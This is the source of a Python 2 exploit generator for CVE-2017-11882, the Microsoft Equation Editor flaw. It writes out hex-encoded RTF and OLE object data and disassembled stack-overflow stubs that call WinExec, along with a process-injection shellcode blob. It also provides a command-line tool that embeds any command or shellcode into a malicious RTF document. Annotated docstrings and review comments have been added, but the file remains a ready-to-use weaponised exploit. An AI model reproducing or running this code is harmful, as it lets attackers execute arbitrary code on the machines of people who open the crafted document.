FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
'''
stuff605 = '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000B5020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
tail605 = r'''
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
\par}
'''
# 0: b8 44 eb 71 12 mov eax,0x1271eb44
# 5: ba 78 56 34 12 mov edx,0x12345678
# a: 31 d0 xor eax,edx
# c: 8b 08 mov ecx,DWORD PTR [eax]
# e: 8b 09 mov ecx,DWORD PTR [ecx]
# 10: 8b 09 mov ecx,DWORD PTR [ecx]
# 12: 66 83 c1 3c add cx,0x3c
# 16: 31 db xor ebx,ebx
# 18: 53 push ebx
# 19: 51 push ecx
# 1a: be 64 3e 72 12 mov esi,0x12723e64
# 1f: 31 d6 xor esi,edx
# 21: ff 16 call DWORD PTR [esi] // call WinExec
# 23: 53 push ebx
# 24: 66 83 ee 4c sub si,0x4c
# 28: ff 10 call DWORD PTR [eax] // call ExitProcess
stagecmd = "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"
# pads with nop
stagecmd = stagecmd.ljust(44, '\x90')
# 0: b8 44 eb 71 12 mov eax,0x1271eb44
# 5: ba 78 56 34 12 mov edx,0x12345678
# a: 31 d0 xor eax,edx
# c: 8b 08 mov ecx,DWORD PTR [eax]
# e: 8b 09 mov ecx,DWORD PTR [ecx]
# 10: 8b 09 mov ecx,DWORD PTR [ecx]
# 12: 66 83 c1 3c add cx,0x3c
# 16: ff e1 jmp ecx
stagesc = "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\xFF\xE1"
# pads with nop
stagesc = stagesc.ljust(44, '\x90')
# This is shellcode to inject into another EQNEDT32.EXE and execute it
# source at shellcode.c
stageinject = 'U\x8b\xec\x83\xe4\xf8\x81\xec\xc4\x03\x00\x00\xb9U\x95\xdbmSVW\xe8\xc8\x02\x00\x00\x8b\xf8\x85\xffu\x18\xb9u\xee@p\xe8\xb8\x02\x00\x00\x8b\xf8\x85\xffu\x083\xc0@\xe9\xa3\x02\x00\x00\xba\x9e3i\xb7\x8b\xcf\xe8\xfb\x02\x00\x00\x8b\xf0\x85\xf6t\xe6\xba*\x92\x12\xd8\xe8\xeb\x02\x00\x003\xdb\x89D$ \x85\xc0u\x03S\xff\xd6\xba\xc8\xe8"o\x8b\xcf\xe8\xd2\x02\x00\x00\x89D$8\x85\xc0u\x03S\xff\xd6\xba\xc2\xcf\xa2\xeb\x8b\xcf\xe8\xbb\x02\x00\x00\x89D$D\x85\xc0u\x03S\xff\xd6\xba\xaa?z\xbe\x8b\xcf\xe8\xa4\x02\x00\x00\x89D$4\x85\xc0u\x03S\xff\xd6\xba\xf3\xf4\xf8\x97\x8b\xcf\xe8\x8d\x02\x00\x00\x89D$$\x85\xc0u\x03S\xff\xd6\xbaN\x96 ~\x8b\xcf\xe8v\x02\x00\x00\x89D$0\x85\xc0u\x03S\xff\xd6\xba\x19.\xb5\xae\x8b\xcf\xe8_\x02\x00\x00\x8b\xd8\x85\xdbu\x03P\xff\xd6\xbaZj\x0c\xbb\x8b\xcf\xe8J\x02\x00\x00\x89D$@\x85\xc0u\x03P\xff\xd6\xba\x8d\xbfw\x82\x8b\xcf\xe83\x02\x00\x00\x89D$<\x85\xc0u\x03P\xff\xd6jDY\x8dD$X3\xd2\x88\x10@Iu\xfaj\x10Y\x8dD$H\x88\x10@Iu\xfa3\xc0\xc7D$XD\x00\x00\x00f\x89\x84$\x88\x00\x00\x00\x8dD$HP\x8dD$\\\xc7\x84$\x88\x00\x00\x00\x01\x00\x00\x00PRRj\x02RRR\x8dD$0\xc7D$0EQNEPR\xc7D$<DT32\[email protected]\x88T$D\xff\xd3\x85\xc0u\x04j\xff\xff\xd6j`Y\x8d\x84$\xa0\x00\x00\x00\xc6\x00\x00@Iu\xf9\x83\xbc$\xa0\x00\x00\x00\x03tA\x8b|$4\x8b\\$$h\x88\x13\x00\x00\x8d\x84$\xa4\x00\x00\x00P\xff\xd7\x85\xc0u\x03P\xff\xd6\x83\xbc$\xa0\x00\x00\x00\x03t\x19h\x02\x00\x01\x00\xfft$X\xfft$X\xff\xd3\x83\xbc$\xa0\x00\x00\x00\x03u\xc7\x8b\x9c$\xb0\x00\x00\x00\x8d\x84$\x00\x01\x00\x00\x8b\xbc$\xb4\x00\x00\x00\xb9\xcc\x02\x00\x00\xc6\x00\x00@Iu\xf9\x8d\x84$\x00\x01\x00\x00\xc7\x84$\x00\x01\x00\x00\x01\x00\x01\x00PW\xffT$L\x85\xc0u\x03P\xff\xd6\x8dD$,Pj@h\x00P\x00\x00h\x00\x10@\x00S\xffT$4\x85\xc0u\x03P\xff\xd6\x83d$,\x00\xe8k\x01\x00\x00\x83d$(\x00\x8dH\x01\x89L$ \x8bD$ 
\x8b\x00\x89D$(\x8dD$,\x83\xc1\x04P\xfft$,Qh\x00\x10@\x00S\xffT$L3\xdb\x85\xc0u\x03S\xff\xd6\x8d\x84$\x00\x01\x00\x00\xc7\x84$\xb8\x01\x00\x00\x00\x10@\x00PW\xffT$8\x85\xc0u\x03S\xff\xd6S\xffT$D\x85\xc0u\x03S\xff\xd6h\x02\x00\x01\x00\xfft$X\xfft$X\xffT$0\x85\xc0u\x03S\xff\xd6\xfft$P\xffT$@\x85\xc0u\x03S\xff\xd6S\xff\xd6_^[\x8b\xe5]\xc3U\x8b\xecQSVW\x8b\xd9d\xa10\x00\x00\x00\x8b@\x0c\x8bp\x0c\x8bV0\x8b\xc2\x89E\xfc\x85\xd2t%\x0f\xb7\x02\xb9\x05\x15\x00\x003\xff\xeb\rk\xc9!\x0f\xb7\xc0\x03\xc8G\x0f\xb7\x04zf\x85\xc0u\xee;\xcbt\x15\x8bE\xfc\x8b6\x8bV0;\xd0u\xce3\xc0_^[\x8b\xe5]\xc3\x8bF\x18\xeb\xf4U\x8b\xec\x83\xec\x10\x8bA<\x89U\xfc\x8bD\x08x\x85\xc0tV\x8bT\x08\x1cS\x8b\\\x08$\x03\xd1V\x8bt\x08 \x03\xd9\x8bD\x08\x18\x03\xf1\x89U\xf03\xd2\x89u\xf4\x89E\xf8W\x85\xc0t)\x8b4\x96\xbf\x05\x15\x00\x00\x03\xf1\xeb\tk\xff!\x0f\xbe\xc0\x03\xf8F\x8a\x06\x84\xc0u\xf1;}\xfct\x12\x8bu\xf4B;U\xf8r\xd73\xc0_^[\x8b\xe5]\xc3\x0f\xb7\x04S\x8bU\xf0\x8b\x04\x82\x03\xc1\xeb\xeb\xeb\x04\x8b\x04$\xc3\xe8\xf7\xff\xff\xff\xc3'
def genrtf605(type, cmd):
    """Build the short-input (len(cmd) <= 605) variant of the RTF document.

    `type` truthy selects the stagecmd stub, falsy the stagesc stub (the
    parameter name shadows the builtin; kept as-is for callers). `cmd` is
    the command string or raw code (a Python 2 str) to embed.
    Returns head605 + hex(payload) + stuff605 + hex(remainder) + tail605.
    Notes: head605 is not defined in this part of the file; str.encode('hex')
    is Python 2 only (Python 3 has no such codec). A cmd longer than 605
    bytes is not truncated here -- the second hex region simply grows --
    so callers rely on genrtf's length check.
    """
    # Fixed 38-byte prefix of the embedded object record, taken as-is.
    payload = '\x1c\x00\x00\x00\x02\x00\xa8\xc3\x99\x02\x00\x00\x00\x00\x00\x00H\x90]\x00l\x9c[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
    # Both stubs are padded to 44 bytes where they are defined.
    if type:
        payload += stagecmd
    else:
        payload += stagesc
    payload += pack('<I', 0x00402114) # ret
    payload += '\x00' * 2
    # The first 0x100 bytes hold the prefix, stub, "ret" value and two NULs
    # (38 + 44 + 4 + 2 = 88); the remaining 168 bytes take the head of cmd.
    left = 0x100 - len(payload)
    payload += cmd[:left]
    payload = payload.ljust(0x100, '\x00')
    # The rest of cmd lands in a second region padded to 437 bytes;
    # 168 + 437 = 605 is the limit this variant is sized for.
    return head605 + payload.encode('hex') + stuff605 + cmd[left:].ljust(437, '\x00').encode('hex') + tail605
def genrtf17k(type, cmd):
    """Build the long-input (605 < len(cmd) <= 17967) variant of the RTF document.

    `type` truthy selects the stagecmd stub, falsy the stagesc stub; `cmd`
    is the command string or raw code (a Python 2 str) to embed.
    Returns head17k and tail17k lower-cased around the hex-encoded payload.
    Notes: str.encode('hex') is Python 2 only. A cmd longer than 17967
    bytes is not truncated here (ljust only pads), so the output region
    would exceed 18055 bytes; genrtf rejects such input before calling this.
    """
    # Fixed 38-byte prefix of the embedded object record, taken as-is.
    payload = '\x1c\x00\x00\x00\x02\x00\xa8\xc3kF\x00\x00\x00\x00\x00\x00\xa0_s\x00d\x0cq\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
    # Both stubs are padded to 44 bytes where they are defined.
    if type:
        payload += stagecmd
    else:
        payload += stagesc
    payload += pack('<I', 0x00402114) # ret
    payload += '\x00' * 2
    payload += cmd
    # 18055 - (38 + 44 + 4 + 2) = 17967, the per-input limit checked in genrtf.
    payload = payload.ljust(18055, '\x00')
    return head17k.lower() + payload.encode('hex') + tail17k.lower()
def genrtf(type, cmd):
    """Dispatch to the generator that matches the size of *cmd*.

    `type` truthy means *cmd* is a command string, falsy means raw code;
    the name shadows the builtin but is kept for callers.
    Raises ValueError when len(cmd) exceeds 17967 (the message says
    "shorter than", yet a length of exactly 17967 is accepted).
    Inputs of at most 605 bytes go to genrtf605, larger ones to genrtf17k.
    """
    size = len(cmd)
    if size > 17967:
        msg = ('Command must be shorter than 17967 bytes!' if type
               else 'Code must be shorter than 17967 bytes!')
        raise ValueError(msg)
    builder = genrtf17k if size > 605 else genrtf605
    return builder(type, cmd)
if __name__ == '__main__':
    # Command-line entry point: parse options, load the input, write the RTF.
    # Python 2 only (print statement below; str.encode('hex') in the generators).
    parser = argparse.ArgumentParser(prog='CVE-2017-11882.py',
                                     description="Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)")
    # With -t 1 (the default) -c is the command text itself; with -t 0 it
    # is a path to a file read in binary mode.
    parser.add_argument("-c", "--cmd",
                        help="Command or shellcode file to run in target system\n(Must be shorter than 17967 bytes!!)",
                        required=True)
    parser.add_argument("-t", "--type", help="Type (0:shellcode 1:command, default=1)", default=1, type=int,
                        choices=[0, 1],
                        required=False)
    # -i takes a value, but only its presence (is not None) is checked below;
    # it has no effect unless -t 0 is used.
    parser.add_argument("-i", "--inject", help="Inject shellcode to new process", default=None, required=False)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    args = parser.parse_args()
    data = ''
    if args.type:
        data = args.cmd
    else:
        try:
            # NOTE(review): the handle is not closed if read() raises; a
            # with-block (as used for the output below) would close it.
            f = open(args.cmd, 'rb')
            data = f.read()
            f.close()
            if args.inject is not None:
                # Prefix the stageinject stub and the 4-byte little-endian
                # length of the file contents (see stageinject's comment).
                data = stageinject + pack('<I', len(data)) + data
        # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit
        # and discards the original error; `except IOError` would be narrower
        # and keep the cause visible.
        except:
            raise ValueError('Error in reading shellcode file!')
    # genrtf raises ValueError when the input exceeds 17967 bytes.
    with open(args.output, 'wb') as f:
        f.write(genrtf(args.type, data))
        # NOTE(review): redundant -- the with-block closes the file on exit.
        f.close()
    print 'Done.'